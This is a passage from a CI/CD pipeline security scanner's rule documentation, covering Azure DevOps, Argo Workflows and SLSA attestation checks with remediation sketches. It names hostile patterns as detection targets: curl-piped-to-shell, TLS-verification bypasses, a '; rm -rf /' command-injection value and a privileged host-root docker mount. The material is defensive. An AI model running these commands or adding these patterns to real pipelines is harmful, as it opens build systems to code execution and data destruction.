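  - job: build
    timeoutInMinutes: 20   # p95 runtime plus margin
    steps:
      - script: ./build.sh
```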

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: ADO-015 in the Azure DevOps provider.

ADO-016: Remote script piped to shell interpreter HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects curl | bash, wget | sh, and similar patterns that pipe remote content directly into a shell interpreter inside a pipeline. An attacker who controls the remote endpoint (or poisons DNS / CDN) gains arbitrary code execution in the build agent.

Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository.
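
A download-verify-execute sketch (the URL and checksum are placeholders):

```yaml
- script: |
    curl -fsSL -o install.sh https://example.com/install.sh
    # Checksum recorded when the script was last reviewed
    echo "<expected-sha256>  install.sh" | sha256sum -c -
    sh install.sh
```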

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Established vendor installers (get.docker.com, sh.rustup.rs, bun.sh/install, awscli.amazonaws.com, cli.github.com, ...) ship via HTTPS from their own CDN and are idiomatic. This rule defaults to LOW confidence so CI gates can ignore them with --min-confidence MEDIUM; the finding still surfaces so teams that want cryptographic verification can audit.

Source: ADO-016 in the Azure DevOps provider.

ADO-017: Docker run with insecure flags (privileged/host mount) CRITICAL 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Flags like --privileged, --cap-add, --net=host, or host-root volume mounts (-v /:/) in a pipeline give the container full access to the build agent, enabling container escape and lateral movement.

Recommendation. Remove --privileged and --cap-add flags. Use minimal volume mounts. Prefer rootless containers.
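
A before/after sketch (the image name is hypothetical):

```yaml
# Risky: full access to the build agent from inside the container
- script: docker run --privileged -v /:/host my-image

# Safer: drop capabilities, mount only what the job needs
- script: docker run --cap-drop=ALL -v "$(Build.SourcesDirectory):/src" my-image
```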

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: ADO-017 in the Azure DevOps provider.

ADO-018: Package install from insecure source HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects package-manager invocations that use plain HTTP registries (--index-url http://, --registry=http://) or disable TLS verification (--trusted-host, --no-verify) in a pipeline. These patterns allow man-in-the-middle injection of malicious packages.

Recommendation. Use HTTPS registry URLs. Remove --trusted-host and --no-verify flags. Pin to a private registry with TLS.
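
For example, a pip install against a TLS-terminated private registry (the URL is hypothetical):

```yaml
- script: |
    # HTTPS index, no --trusted-host bypass
    pip install --index-url https://pypi.internal.example.com/simple/ -r requirements.txt
```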

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: ADO-018 in the Azure DevOps provider.

ADO-019: extends: template on PR-validated pipeline points to local path CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. extends: template: <local-file> includes another YAML from the current repo. On PR validation builds, the repo content is the PR branch, letting the PR author swap the template body and inject arbitrary pipeline logic. Cross-repo templates (template: foo.yml@my-repo) are version-pinned and not affected.

Recommendation. Pin the extends template to a protected repository ref (template@ref). Local templates in PR-validated pipelines can be poisoned by the PR author.

Source: ADO-019 in the Azure DevOps provider.

ADO-020: No vulnerability scanning step MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Without a vulnerability scanning step, known-vulnerable dependencies ship to production undetected. The check recognizes trivy, grype, snyk, npm audit, yarn audit, safety check, pip-audit, osv-scanner, and govulncheck.

Recommendation. Add a vulnerability scanning step such as trivy, grype, snyk test, npm audit, pip-audit, or osv-scanner. Publish results so vulnerabilities surface before deployment.

Source: ADO-020 in the Azure DevOps provider.

ADO-021: Package install without lockfile enforcement MEDIUM 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects package-manager install commands that do not enforce a lockfile or hash verification. Without lockfile enforcement the resolver pulls whatever version is currently latest, exactly the window a supply-chain attacker exploits.

Recommendation. Use lockfile-enforcing install commands: npm ci instead of npm install, pip install --require-hashes -r requirements.txt, yarn install --frozen-lockfile, bundle install --frozen, and go install tool@v1.2.3.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: ADO-021 in the Azure DevOps provider.

ADO-022: Dependency update command bypasses lockfile pins MEDIUM 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects pip install --upgrade, npm update, yarn upgrade, bundle update, cargo update, go get -u, and composer update. These commands bypass lockfile pins and pull whatever version is currently latest. Tooling upgrades (pip install --upgrade pip) are exempted.

Recommendation. Remove dependency-update commands from CI. Use lockfile-pinned install commands (npm ci, pip install -r requirements.txt) and update dependencies via a dedicated PR pipeline (e.g. Dependabot, Renovate).

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Common build-tool bootstrapping idioms (pip install --upgrade pip, pip install --upgrade setuptools wheel virtualenv) and security-tool installs (pip install --upgrade pip-audit / cyclonedx-bom / semgrep) are exempted by the DEP_UPDATE_RE tooling allowlist. Other tooling-upgrade idioms not yet on the list can still trip the rule. Defaults to MEDIUM confidence so CI gates can require --min-confidence HIGH to ignore.

Source: ADO-022 in the Azure DevOps provider.

ADO-023: TLS / certificate verification bypass HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects patterns that disable TLS certificate verification: git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, curl -k, wget --no-check-certificate, PYTHONHTTPSVERIFY=0, and GOINSECURE=. Disabling TLS verification allows MITM injection of malicious packages, repositories, or build tools.

Recommendation. Remove TLS verification bypasses. Fix certificate issues at the source (install CA certificates, configure proper trust stores) instead of disabling verification.
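
A hedged sketch of the fix-at-the-source pattern, assuming a Debian/Ubuntu agent and a hypothetical internal-ca.crt file:

```yaml
steps:
  # Flagged: disables certificate verification for all git traffic
  # - script: git config --global http.sslVerify false

  # Passes: trust the internal CA explicitly, keep verification on
  - script: |
      sudo cp internal-ca.crt /usr/local/share/ca-certificates/internal-ca.crt
      sudo update-ca-certificates
    displayName: Install internal CA certificate
```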

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: ADO-023 in the Azure DevOps provider.

ADO-024: No SLSA provenance attestation produced MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. On Azure Pipelines the common pattern is a Bash@3 task invoking cosign attest --yes --predicate=provenance.json $(image). The native Microsoft SBOM tool emits _manifest/spdx_2.2/manifest.spdx.json for SBOM but does not produce provenance on its own.

Recommendation. Add a task that runs cosign attest against a provenance.intoto.jsonl statement, or Microsoft's sbom-tool in attestation mode. ADO-006 covers signing; this rule covers the in-toto statement SLSA Build L3 additionally requires.

Source: ADO-024 in the Azure DevOps provider.

ADO-025: Cross-repo template not pinned to commit SHA HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Azure Pipelines resolves template: build.yml@tools against the tools repo resource's ref: field. When that ref is refs/heads/main (or missing, which defaults to the pipeline's default branch), a push to the callee repo changes what your pipeline runs on the next invocation.

Recommendation. On every resources.repositories entry referenced from a template: ...@repo-alias directive, set ref: refs/tags/<sha> or the bare 40-char commit SHA, never a branch or floating tag. A moved branch/tag swaps the template body without changing your pipeline file.
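
Sketch of a pinned repository resource (project, repo, and SHA are placeholders):

```yaml
resources:
  repositories:
    - repository: tools                # alias referenced as @tools
      type: git
      name: MyProject/tools            # hypothetical project/repo
      # Pinned: a moved branch or tag can no longer swap the template body
      ref: 0a1b2c3d4e5f60718293a4b5c6d7e8f901234567

stages:
  - template: build.yml@tools
```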

Source: ADO-025 in the Azure DevOps provider.

ADO-026: Pipeline contains indicators of malicious activity CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution, CICD-SEC-7 Insecure System Configuration.

How this is detected. ADO pipelines can run arbitrary shell via bash / script / powershell tasks. This rule scans every string value for known-bad patterns (reverse shells, base64-decoded execution, miner binaries, exfil channels). Orthogonal to ADO-016/ADO-017/ADO-023.

Recommendation. Treat as a potential compromise. Identify the PR/branch that added the matching task(s), rotate any Service Connections the pipeline can reach, and audit Pipeline run logs for outbound traffic to the matched hosts.

Known false positives.

  • Security-training repositories, CTF challenges, and red-team exercise pipelines legitimately contain reverse-shell strings or exfil domains as literals. Matches inside YAML keys / HCL attributes whose names contain example, fixture, sample, demo, or test are auto-suppressed; bare lines in a production pipeline still fire.
  • Defaults to LOW confidence. Filter with --min-confidence MEDIUM to ignore all matches; the rule still surfaces the hit for teams that want to spot-check.

Source: ADO-026 in the Azure DevOps provider.

ADO-027: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Complements ADO-002 (script injection from untrusted PR context). Fires on intrinsically risky shell idioms (eval, sh -c "$X", backtick exec) regardless of whether the input source is currently trusted.

Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec with direct command invocation. Validate any value that must feed a dynamic command at the boundary.

Known false positives.

  • eval "$(ssh-agent -s)" and similar eval "$(<literal-tool>)" bootstrap idioms are intentionally NOT flagged: the substituted command is literal; only its output is eval'd.

Source: ADO-027 in the Azure DevOps provider.

ADO-028: Package install bypasses registry integrity (git / path / tarball source) MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Complements ADO-021 (missing lockfile flag). Git URL installs without a commit pin, local-path installs, and direct tarball URLs bypass the registry integrity controls the lockfile relies on.

Recommendation. Pin git dependencies to a commit SHA. Publish private packages to an internal registry (Azure Artifacts) instead of installing from a filesystem path or tarball URL.

Source: ADO-028 in the Azure DevOps provider.

ADO-029: Service-connection-using job without environment or branch gate HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. Pairs with IAM-008 (the AWS-side OIDC rule). Azure's equivalent trust path runs through service connections that map to Azure AD federated identity credentials. The ADO-side gate is either a deployment + environment or a branch-pinned condition; this rule flags jobs that have neither.

Recommendation. Every job that consumes an Azure service connection (via AzureCLI@, AzurePowerShell@, AzureKeyVault@, AzureWebApp@, etc.) must either be a deployment: job bound to an environment: (which carries approval checks and audit) or carry a condition: that pins Build.SourceBranch to a protected ref. Without one of those gates, any branch push drives the federated assume-role on Azure AD.
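
Both gate shapes, sketched with hypothetical names (prod-connection, production):

```yaml
jobs:
  # Option A: deployment job bound to an environment (approvals + audit trail)
  - deployment: deploy
    environment: production
    strategy:
      runOnce:
        deploy:
          steps:
            - task: AzureCLI@2
              inputs:
                azureSubscription: prod-connection
                scriptType: bash
                scriptLocation: inlineScript
                inlineScript: az webapp list

  # Option B: ordinary job pinned to a protected ref
  - job: deploy_gated
    condition: eq(variables['Build.SourceBranch'], 'refs/heads/main')
    steps:
      - script: echo deploying
```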

Source: ADO-029 in the Azure DevOps provider.

ADO-030: pool interpolates attacker-controllable value HIGH 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. ADO-013 catches self-hosted pools that aren't ephemeral; this rule catches the upstream targeting choice. When pool: (or its name / demands sub-fields) is computed from an attacker-controllable expression, whoever triggers the pipeline picks where the job runs, including any agent pool the project exposes (deploy-prod, signer, hsm …). Two attacker surfaces are flagged: runtime SCM macros ($(Build.SourceBranchName), $(System.PullRequest.SourceBranch), …) and caller-controlled template parameters (${{ parameters.X }}, whose value comes from whoever queued the run). The rule walks all three pool shapes: string scalar, dict { name, vmImage, demands }, and the demands list form.

Recommendation. Hard-code pool: to a specific agent pool name (or vmImage: for Microsoft-hosted). If pool selection has to be parameterised, validate the candidate against an explicit allowlist before the job runs (e.g. a condition: guard against a vetted set), and never inline $(Build.*) / $(System.PullRequest.*) / ${{ parameters.X }} values as the pool name or as a demand.
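
Flagged vs. passing pool shapes (the pool name is illustrative):

```yaml
# Flagged: whoever names the branch picks the agent pool
# pool:
#   name: $(Build.SourceBranchName)

# Passes: a literal pool only the pipeline author can change
pool:
  name: linux-build-pool

# Passes: Microsoft-hosted image
# pool:
#   vmImage: ubuntu-latest
```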

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Pipelines that intentionally select agent pools via a vetted variables: block (POOL_NAME: prod-pool) are out of scope: pipeline variables defined in the same file are author-controlled. Static custom names are not flagged. The rule only matches the curated runtime-macro catalog and the literal ${{ parameters.X }} template-parameter shape.

Source: ADO-030 in the Azure DevOps provider.

ARGO-001: Argo template container image not pinned to a digest HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Walks spec.templates[].container, spec.templates[].script, and spec.templates[].containerSet.containers[]. The image must contain @sha256: followed by a 64-char hex digest.

Recommendation. Pin every container / script template image to a content-addressable digest (alpine@sha256:<digest>). Tag-only references (alpine:3.18) and rolling tags (alpine:latest) let a compromised registry update redirect the workflow's containers at the next pull, with no audit trail in the WorkflowTemplate.
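
A minimal pinned template (the digest value is illustrative, not a real alpine digest):

```yaml
spec:
  templates:
    - name: build
      container:
        # Flagged: image: alpine:3.18  (tag can be re-pushed)
        image: alpine@sha256:0a1b2c3d4e5f60718293a4b5c6d7e8f90a1b2c3d4e5f60718293a4b5c6d7e8f9
        command: [sh, -c]
        args: ["make build"]
```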

Source: ARGO-001 in the Argo Workflows provider.

ARGO-002: Argo template container runs privileged or as root HIGH

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. Detection fires on securityContext.privileged: true, runAsUser: 0, runAsNonRoot: false, allowPrivilegeEscalation: true, or no securityContext block at all. Also walks spec.podSpecPatch (raw YAML) for an explicit privileged: true token.

Recommendation. Set securityContext.privileged: false, runAsNonRoot: true, and allowPrivilegeEscalation: false on every template container / script. A privileged container shares the node's kernel namespaces; a malicious image then has root on the build node and breaks the boundary between workflow and cluster.
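
The hardened securityContext the rule looks for, as a sketch (the UID and image reference are illustrative):

```yaml
spec:
  templates:
    - name: build
      container:
        image: registry.example.com/build@sha256:0a1b2c3d4e5f60718293a4b5c6d7e8f90a1b2c3d4e5f60718293a4b5c6d7e8f9
        securityContext:
          privileged: false
          runAsNonRoot: true
          runAsUser: 1000
          allowPrivilegeEscalation: false
```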

Source: ARGO-002 in the Argo Workflows provider.

ARGO-003: Argo workflow uses the default ServiceAccount MEDIUM

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. Applies to Workflow and CronWorkflow. WorkflowTemplate / ClusterWorkflowTemplate are exempt because the SA is set on the run that references them. An explicit serviceAccountName: default is treated the same as omission.

Recommendation. Set spec.serviceAccountName (or spec.workflowSpec.serviceAccountName for CronWorkflow) to a least-privilege ServiceAccount that carries only the secrets and RBAC the workflow needs. Falling back to the namespace's default SA grants access to whatever cluster-admin or wildcard role someone later binds to default; that privilege-escalation surface should never be load-bearing for workflow pods.

Source: ARGO-003 in the Argo Workflows provider.

ARGO-004: Argo workflow mounts hostPath or shares host namespaces CRITICAL

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. Walks spec.volumes[].hostPath and the raw spec.podSpecPatch string for hostNetwork, hostPID, hostIPC, and hostPath.

Recommendation. Use emptyDir or PVC-backed volumes instead of hostPath. Drop hostNetwork: true / hostPID: true / hostIPC: true from any inline podSpecPatch. A hostPath mount of /var/run/docker.sock or / lets the workflow break out of the pod and act as the underlying node.

Source: ARGO-004 in the Argo Workflows provider.

ARGO-005: Argo input parameter interpolated unsafely in script / args CRITICAL

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Fires on any {{inputs.parameters.X}}, {{workflow.parameters.X}}, or {{item.X}} token inside a script.source body or a container.args string that isn't already wrapped in quotes. Doesn't fire on the env-var indirection pattern, which is safe.

Recommendation. Don't interpolate {{inputs.parameters.<name>}} directly into script.source or container.args. Argo substitutes the value before the shell parses it, so a parameter containing ; rm -rf / runs as shell. Pass the parameter via env: (value: '{{inputs.parameters.<name>}}') and reference the env var quoted in the script ("$NAME"); or use inputs.artifacts for file payloads.
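
The env-var indirection pattern the recommendation describes, as a minimal sketch (the flagged shape would inline the {{inputs.parameters.who}} token directly in source):

```yaml
templates:
  - name: greet
    inputs:
      parameters:
        - name: who
    script:
      image: alpine:3.19
      command: [sh]
      env:
        # Argo substitutes here, but the value never touches shell syntax
        - name: WHO
          value: '{{inputs.parameters.who}}'
      source: |
        echo "Hello $WHO"
```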

Source: ARGO-005 in the Argo Workflows provider.

ARGO-006: Literal secret value in Argo template env or parameter default CRITICAL 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene, CICD-SEC-7 Insecure System Configuration.

How this is detected. Strong matches: AWS access keys, GitHub PATs, JWTs. Weak match: env var name suggests a secret (*_TOKEN, *_KEY, *PASSWORD, *SECRET) and the value is a non-empty literal rather than an interpolation.

Recommendation. Mount secrets via env.valueFrom.secretKeyRef (or a volumes: Secret mount) instead of writing the value into env.value or arguments.parameters[].value. Workflow manifests are committed to git and cluster-readable; literal values leak through normal access paths.
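
Sketch of the secretKeyRef indirection (Secret name and key are hypothetical):

```yaml
container:
  image: registry.example.com/app:1.2.3
  env:
    # Flagged: a literal token written into the manifest
    # - name: API_TOKEN
    #   value: "hunter2-not-really"

    # Passes: resolved from a Kubernetes Secret at pod start
    - name: API_TOKEN
      valueFrom:
        secretKeyRef:
          name: ci-credentials
          key: api-token
```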

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: ARGO-006 in the Argo Workflows provider.

ARGO-007: Argo workflow has no activeDeadlineSeconds LOW

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Applies to Workflow, CronWorkflow, WorkflowTemplate, and ClusterWorkflowTemplate. The field can sit at the workflow level or on individual templates.

Recommendation. Set spec.activeDeadlineSeconds (or spec.workflowSpec.activeDeadlineSeconds on a CronWorkflow) so a hung step can't pin the workflow controller's reconcile cycle indefinitely. Pick a value generous enough for the slowest legitimate run (e.g. 3600 for a typical pipeline, 21600 for ML training). Per-template activeDeadlineSeconds is also accepted as evidence of intent.

Source: ARGO-007 in the Argo Workflows provider.

ARGO-008: Argo script source pipes remote install or disables TLS HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Walks script.source and joined container.args text with the cross-provider CURL_PIPE_RE and TLS_BYPASS_RE regexes.

Recommendation. Replace curl ... | sh with a download-then-verify-then-execute pattern. Drop TLS-bypass flags (curl -k, git config http.sslVerify false); install the missing CA into the template image instead. Both forms let an attacker controlling DNS / a transparent proxy substitute the script the workflow runs.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: ARGO-008 in the Argo Workflows provider.

ARGO-009: Artifacts not signed (no cosign/sigstore step) MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Detection mirrors GHA-006 / TKN-009 / BK-009: the shared signing-token catalog (cosign, sigstore, slsa-github-generator, slsa-framework, notation-sign) is searched across every string in each Argo document. Fires only on artifact-producing Workflows / WorkflowTemplates (those that invoke docker build / docker push / kaniko / helm upgrade / aws s3 sync / etc.) so lint-only Workflows don't trip it.

Recommendation. Add a cosign step to the Workflow. The most common shape is a final sign template that runs cosign sign --yes <repo>@sha256:<digest> after the build. Sign by digest, not tag, so a re-pushed tag can't bypass the signature.
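
A sketch of the final sign template (image tag, registry, and the digest-parameter plumbing are assumptions):

```yaml
  - name: sign
    inputs:
      parameters:
        - name: digest            # produced by the build template
    container:
      image: ghcr.io/sigstore/cosign/cosign:v2.2.4
      command: [cosign]
      args:
        - sign
        - --yes
        # Sign by digest, not tag, so a re-pushed tag can't bypass it
        - 'registry.example.com/app@{{inputs.parameters.digest}}'
```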

Source: ARGO-009 in the Argo Workflows provider.

ARGO-010: No SBOM generated for build artifacts MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. An SBOM (CycloneDX or SPDX) records every component baked into the build. Without one, post-incident triage can't answer 'did this CVE ship?' for a given artifact. Detection uses the shared SBOM-token catalog: syft, cyclonedx, cdxgen, spdx-tools, microsoft/sbom-tool. Fires only on artifact-producing Workflows.

Recommendation. Add an SBOM-generation template. syft <artifact> -o cyclonedx-json > /tmp/sbom.json runs in any standard container; cyclonedx-cli and cdxgen are alternative producers. Persist the SBOM as an output artifact so downstream templates and consumers can read it.

Source: ARGO-010 in the Argo Workflows provider.

ARGO-011: No SLSA provenance attestation produced MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Provenance generation is distinct from signing. A signed artifact proves who published it; a provenance attestation proves where / how it was built. Detection uses the shared provenance-token catalog (slsa-framework, cosign attest, in-toto, witness run, attest-build-provenance).

Recommendation. Add a cosign attest --predicate slsa.json --type slsaprovenance <ref> step after the build template, or use witness run to record the build environment. Publish the attestation alongside the artifact so consumers can verify how it was built, not just who signed it.

Source: ARGO-011 in the Argo Workflows provider.

ARGO-012: No vulnerability scanning step MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Vulnerability scanning sits at a different layer from signing and SBOM. It answers 'does this artifact ship a known CVE?' rather than 'can we verify what it is?'. Detection uses the shared vuln-scan-token catalog: trivy, grype, snyk, npm-audit, pip-audit, osv-scanner, govulncheck, anchore, codeql-action, semgrep, bandit, checkov, tfsec. Walks every Argo document and passes if any document includes a scanner reference.

Recommendation. Add a vulnerability scanner template. trivy fs /workdir for source / filesystem; trivy image <ref> for container images. grype, snyk, npm audit, pip-audit are alternatives. Fail the template on findings above a chosen severity so a regression blocks the merge instead of shipping.

Source: ARGO-012 in the Argo Workflows provider.

ARGO-013: Argo workflow does not opt out of SA token automount MEDIUM

Evidences: CICD-SEC-2 Inadequate Identity and Access Management, CICD-SEC-7 Insecure System Configuration.

How this is detected. Companion to ARGO-003 (default ServiceAccount). The default SA only matters when its token is mounted; an explicit automountServiceAccountToken: false removes the token from the pod regardless of which SA the pod is bound to. Detection: workflow passes when the spec sets it to false AND every template either inherits that or sets its own automountServiceAccountToken: false. A template with it explicitly true (or unset against an unset spec-level value) is the failing shape.

Recommendation. Set spec.automountServiceAccountToken: false on the Workflow / WorkflowTemplate, or per-template (templates[].automountServiceAccountToken: false) on any template that doesn't need to talk to the Kubernetes API. An explicit false keeps a compromised step from using the workflow's SA token to escalate inside the cluster. Even when the SA itself is hardened (ARGO-003), a token automounted into every pod widens the leak surface.
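
Sketch of the passing shape, with a single API-needing template opting back in (names and images are illustrative):

```yaml
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
  generateName: build-
spec:
  serviceAccountName: ci-builder            # least-privilege SA (ARGO-003)
  automountServiceAccountToken: false       # default: no token in any pod
  entrypoint: build
  templates:
    - name: build
      container:
        image: alpine:3.19
        command: [make]
    - name: deploy
      automountServiceAccountToken: true    # only this template needs the API
      container:
        image: bitnami/kubectl:1.30
        command: [kubectl, apply, -f, /manifests]
```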

Known false positives.

  • Templates that genuinely need to call the Kubernetes API (GitOps pull, kubectl apply from inside the workflow). Set automountServiceAccountToken: true on that template specifically and bind it to a least-privilege SA; the rule then fires only on the broad spec-level absence, which is the actual gap.

Source: ARGO-013 in the Argo Workflows provider.

ARGO-014: Argo template script runs unpinned package install MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detection reuses the cross-provider primitives PKG_INSECURE_RE and PKG_NO_LOCKFILE_RE from checks/base.py. Same rule pack already exists for GHA (GHA-021 / GHA-022), GitLab (GL-021 / GL-022), Bitbucket / Azure DevOps / Jenkins / CircleCI / Cloud Build / Buildkite / Tekton / Drone. Argo was a gap; this closes it.

Walks script.source plus joined container.args / container.command text per template. Steps and tasks across DAG / steps templates are equally in scope because they all reduce to a container with a shell payload.

Recommendation. Pin every package install to a lockfile or a checksum-verified version. npm ci (not npm install), yarn install --frozen-lockfile, pip install -r requirements.txt --require-hashes, bundle install --frozen. Don't use --trusted-host / --no-verify / a non-HTTPS index URL — those bypass TLS or trust validation entirely (ARGO-008 covers the TLS subset; this rule covers the lockfile subset).

Known false positives.

  • Bootstrap-stage installs that intentionally pull latest (apt-get install -y curl for a tooling image rebuild) sometimes legitimately bypass the lockfile. Suppress via ignore-file scoped to the specific template name.

Source: ARGO-014 in the Argo Workflows provider.

ARGO-015: Input artifact pulls from an insecure (non-HTTPS) URL HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Argo Workflows resolves input artifacts before the template's container starts. The source can be http, git, s3, gcs, azure, hdfs, oss, or raw. The rule fires when:

  • http.url starts with http:// (cleartext fetch)
  • git.repo starts with git:// (legacy unauthenticated git protocol, no integrity)
  • s3.endpoint is set with insecure: true (explicit TLS bypass)

Other artifact sources are skipped: an OCI / S3 / GCS pull carries its own integrity / signing posture that lives outside this rule.

Recommendation. Pull every input artifact over HTTPS. Replace http:// with https:// in any http.url: block, and use https:// git remote URLs instead of git://, ssh://-without-key-pinning, or anonymous-cleartext access. Plain HTTP fetches let any on-path attacker swap the artifact bytes for a different payload, and Argo will execute whatever bytes arrive without an integrity check unless the artifact source provides one (S3 + checksum, OCI + digest). If the artifact source genuinely doesn't ship over HTTPS (a legacy internal mirror), wrap it in a CDN or proxy that adds TLS, then pin the artifact by checksum on the consuming side.
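
Flagged vs. passing artifact source (the mirror host is hypothetical):

```yaml
inputs:
  artifacts:
    # Flagged: cleartext fetch; an on-path attacker can swap the bytes
    # - name: tool
    #   path: /tmp/tool.tgz
    #   http:
    #     url: http://mirror.internal/tool.tgz

    # Passes: TLS transport
    - name: tool
      path: /tmp/tool.tgz
      http:
        url: https://mirror.internal/tool.tgz
```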

Known false positives.

  • Local-mirror development workflows occasionally use http:// against an internal registry that's only reachable from a private network. The integrity guarantee still relies on network isolation rather than transport encryption; suppress on the specific template name when this is the deliberate shape.

Source: ARGO-015 in the Argo Workflows provider.

ATTEST-001: SLSA provenance attests an untrusted builder identity HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management, CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Reads the SLSA provenance from each in-toto Statement carried in the image's attestation manifests, then checks predicate.builder.id (SLSA v0.2) / predicate.runDetails.builder.id (SLSA v1) against an allowlist of URI prefixes for hosted CI builders. Fires when the attested builder is unknown or matches a self-hosted-runner shape.

Triggering this rule means the bytes of the runtime image were produced by a builder identity the SLSA contract cannot vouch for. A compromised self-hosted runner can produce a perfectly-formed, signature-valid attestation for a tampered image, so a passing OCI-002 (attestation present) is not the same thing as a trustworthy attestation; this rule is the difference.

Recommendation. Re-run the build on a recognized hosted CI builder (GitHub-hosted runners, slsa-github-generator, Cloud Build, GitLab SaaS, Buildkite, or BuildKit attesting via Docker Hub) so the SLSA builder.id claim resolves to an isolated, publicly-auditable build environment. Self-hosted runners and unknown builder identities defeat the SLSA L2+ isolation guarantee: the supply-chain trust chain only extends as far as the builder the attestation names.
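
For orientation, a SLSA v0.2 predicate naming a hosted builder looks roughly like this (the workflow tag is illustrative; slsa-github-generator's workflow path is the kind of URI the allowlist recognizes):

```json
{
  "predicateType": "https://slsa.dev/provenance/v0.2",
  "predicate": {
    "builder": {
      "id": "https://github.com/slsa-framework/slsa-github-generator/.github/workflows/generator_container_slsa3.yml@refs/tags/v2.0.0"
    }
  }
}
```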

Known false positives.

  • Some teams run their own SLSA-conformant builders for policy reasons (air-gapped builds, regulated workloads, FedRAMP environments). Add the builder's URI prefix to a future allowlist override (deferred to v2) or suppress via ignore-file when the team has a documented review of the builder's isolation posture.
  • Older BuildKit versions emitted a generic placeholder (https://github.com/docker/buildx@v0.X) without tying the identity to the runner. Modern Buildx writes a concrete builder URI; if the scan flags a placeholder, upgrade Buildx and rebuild before treating it as a real incident.

Seen in the wild.

  • SLSA threat-model v1.0: untrusted builder is the canonical Build-track Threat #2 ('Build the package from a modified source'). A tampered self-hosted runner can emit a syntactically-valid attestation for the wrong source.
  • GitHub self-hosted runner advisory (CVE-2024-32004 et al.): self-hosted runners default to non-ephemeral, persisted state; a single fork-PR run gives the attacker arbitrary code execution that produces signed artifacts on every subsequent legitimate build. SLSA's isolation requirement (L2+) explicitly excludes this shape.

Source: ATTEST-001 in the OCI manifest provider.

ATTEST-002: SLSA provenance source-repo claim is missing or unverifiable HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. The builder.id claim that ATTEST-001 verifies tells you who built the image. The source-repo claim ATTEST-002 verifies tells you what they built. Both are required for the SLSA chain to be meaningful: a trusted builder running an unknown source produces a signed attestation for code you can't audit.

The rule walks the SLSA provenance predicate for a source URI. Path varies by spec version:

  • v0.2: predicate.invocation.configSource.uri
  • v1.0: predicate.buildDefinition.externalParameters (builder-specific, commonly .workflow.repository or .source.uri)

Fires when:

  • no URI is present anywhere on the expected paths;
  • the URI is a known placeholder (empty, ?, unknown, n/a);
